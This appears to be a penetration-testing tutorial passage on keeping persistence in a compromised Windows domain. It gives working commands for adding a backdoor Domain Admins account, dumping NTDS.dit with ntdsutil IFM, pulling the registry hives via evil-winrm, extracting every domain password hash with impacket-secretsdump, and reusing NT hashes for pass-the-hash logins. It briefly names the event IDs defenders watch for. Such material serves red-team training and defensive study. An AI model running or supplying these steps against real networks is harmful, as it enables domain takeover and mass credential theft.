Plot

Let's say you have successfully compromised the target system with the highest privileges (root, or SYSTEM/Administrator on Windows). However, you might not have a stable shell connection such as SSH, or you might not know any password and only have a reverse shell.

These connections are still shells, but they are noisy and fragile, and they are complicated to reproduce if the session drops.

Below are several ways of maintaining persistence once you have a privileged shell.

Adding Domain Admin User

I can simply create a new domain user and add it to the Domain Admins group. The /domain switch makes both commands operate on the domain rather than on the local machine, so they work from a domain-joined member host as well as from a domain controller:

net user jadu jadu101 /add /domain
net group "Domain Admins" jadu /add /domain

The password has to satisfy the domain's password policy (length and complexity), otherwise the first command fails. Keep in mind that this is loud: user creation is logged as Event ID 4720 and the group addition as Event ID 4728 on the domain controller, and a new member of Domain Admins is exactly what a defender looks for.

Now I can sign in as the created user with evil-winrm.

Dumping NTDS.dit

I can dump NTDS.dit to obtain the password hashes of every domain user and then pass those hashes to authenticate to machines in the domain.

The command below uses ntdsutil's Install From Media (IFM) function, which only works on a domain controller, to write consistent copies of the SECURITY and SYSTEM registry hives and of NTDS.dit under C:\temp. These files can then be downloaded and the password hashes extracted offline:

powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

In C:\temp\registry I find the SECURITY and SYSTEM hives, which I download to my local machine with evil-winrm's download command:

download SECURITY
download SYSTEM

In C:\temp\Active Directory I find the ntds.dit file, which I download to my local machine as well (remember to delete C:\temp on the target afterwards):

download ntds.dit

Now with impacket's secretsdump, run in local (offline) mode, I can obtain the password hashes of the whole domain. The SYSTEM hive is required because it holds the boot key that secretsdump uses to decrypt the hashes stored in ntds.dit:

root@~/tools/mitre/ntds# /usr/bin/impacket-secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local

I could try to crack these hashes, but it is not necessary. Each line of the output has the form domain\user:rid:lmhash:nthash:::, and the NT part can be passed directly (for example with evil-winrm's -H option) to get a shell without ever knowing the cleartext password.

Here are more steps you can follow once you have obtained the Administrator hash.